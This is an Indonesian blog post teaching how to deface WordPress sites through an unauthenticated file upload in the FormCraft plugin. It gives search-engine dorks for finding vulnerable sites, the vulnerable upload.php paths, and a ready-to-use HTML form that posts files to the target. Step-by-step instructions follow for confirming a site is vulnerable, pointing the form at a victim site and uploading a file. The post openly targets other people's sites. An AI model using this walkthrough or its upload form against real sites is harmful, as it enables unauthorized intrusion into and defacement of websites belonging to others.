Iklan 300x250

Deface metode WordPress FormCraft Plugins

Encrypting your link and protect the link from viruses, malware, thief, etc! Made your link safe to visit.

SAZFHI Indonesia - Yo what's up bro, Balik lagi dengan admin yg paling tamvan ini :v, di hari ini admin ingin nge share tutorial Deface metode Wordpress Plugins FormCraft nih, CMS Wordpress dengan sejuta bug di plugin nya, oke sok langsung aja ke pembahasan nya.

Bahan Bahan :

  • Only File type .txt / .jpg
  • Dork :
    - inurl:/wp-content/plugins/formcraft/
    - inurl:/wp-content//plugins/formcraft/file-upload/
    - inurl:/wp-content/plugins/formcraft/ site:.com
  • Exploit :
    - /wp-content/plugins/formcraft/file-upload/server/php/upload.php
    - /wp-content/plugins/formcraft/file-upload/server/content/upload.php
  • CSRF : Click Me Senpai
  • Atau kalian bisa pakai CSRF ini
    <form method="POST" action="http://site.com/wp-content/plugins/formcraft/file-upload/server/php/upload.php"
    enctype="multipart/form-data">
    <input type="file" name="files[]" /><button>Upload</button>
    </form>

Tutorial Deface Wordpress FormCraft Plugins :

  1. Langkah pertama kalian dorking dulu pakai dork yang admin kasih.
  2. Kalo kalian ketemu site yang ada tulisan {"failed":"No file found 2"} nya Maka website itu Vuln.
    Deface-Wordpress-Form-Craft-Plugins-1
  3. Nah abis itu kalian buka CSRF nya. Trus Kalian isi kolom kolom yg disediain.
    *Kalo kalian pake script CSRF yang admin kasih, kalian edit dulu site.com nya pake site yang ingin kalian deface.
    Contoh :
    - Kolom 1 kalian isi target kalian
    - Kolom 2 kalian isi files[]
    - Langsung aja kalian klik SIMPAN
    Deface-Wordpress-Form-Craft-Plugins-2
  4. Nah pada bagian choose file, kalian pilih file yg mau kalian upload, lalu pencet UPLOAD COK. disini admin bakal nge upload file.txt
    Deface-Wordpress-Form-Craft-Plugins-3
  5. Nah jika berhasil ter upload maka akan muncul cara akses nya, tinggal kalian copy & paste di new tab.
    Deface-Wordpress-Form-Craft-Plugins-4
  6. Dan taraaa file text nya pun terupload....
    Deface-Wordpress-Form-Craft-Plugins-5
Oke segitu dulu tutorial yang admin berikan. Kalo kalian punya kritik dan saran silakan kalian komen dibawah.
See you next time :)

Belum ada Komentar untuk "Deface metode WordPress FormCraft Plugins"

Posting Komentar

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel